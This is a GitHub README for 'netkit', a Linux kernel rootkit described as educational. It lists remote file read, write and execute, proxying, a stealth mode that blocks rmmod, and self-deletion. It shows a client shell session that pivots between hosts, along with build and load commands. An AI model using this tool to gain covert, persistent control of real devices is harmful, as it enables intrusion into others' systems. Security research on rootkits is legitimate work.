Notselwyn/netkit

Netkit

Netkit is a purposefully small rootkit which clients can use over the network to maintain a sneaky foothold on a device.

Overview

Netkit has several features:

  • File read
  • File write
  • File execute (stderr + stdout)
  • Proxy
  • Self deletion (stopping the module from running and freeing resources)

Usage

Once the rootkit is loaded into the system, a user may want to interact with it using the provided pseudo-shell:

$ cd netkit
$ python3 client/shell.py 10.10.10.1:8008
10.10.10.1:8008/ $ hosts
usage:
- hosts push <ip>:<port>
- hosts pop

10.10.10.1:8008/ $ hostname
gateway-1a723f

10.10.10.1:8008/ $ hosts push 10.10.10.2:8008
[+] successfully added device 10.10.10.2:8008 to hosts list
10.10.10.1:8008->10.10.10.2:8008/ $ hostname
mail-server

Compilation

To run the rootkit, optionally tweak its configuration, build it using make, and load it using insmod or any other kernel module loader.

==== Please make sure to adjust CONFIG_NETKIT_DEBUG to your liking ====

If CONFIG_NETKIT_DEBUG is enabled, then stealth mode is enabled and the rootkit can only be stopped using the self-destruct / exit command (not using rmmod).

Make sure to set $KERNEL_DIR to your kernel's header files, like KERNEL_DIR=/usr/src/linux-headers-$(uname -r)

git clone https://github.com/notselwyn/netkit/
cd netkit
make KERNEL_DIR=$KERNEL_DIR

ls -la netkit.ko

Running it with notselwyn/kernel-scripts

Since the rootkit was developed with the author's kernel-scripts, it's a breeze to debug and test. Simply download the scripts and compile a compatible Linux kernel.

To run the kernel:

cd netkit
create-image.sh
run.sh $KERNEL_DIR

To run and interact with the rootkit (make sure it's in debug mode to allow for rmmod in run_kmod.sh):

cd netkit
run_kmod.sh netkit.ko netkit
run_python.sh client/shell.py

Disclaimer

The programs and scripts ("programs") in this software directory/folder/repository ("repository") are published, developed and distributed for educational/research purposes only. I ("the creator") do not condone any malicious or illegal usage of the programs in this repository, as the intent is sharing research and not doing illegal activities with it. I am not legally responsible for anything you do with the programs in this repository.

About

Linux rootkit for educational purposes
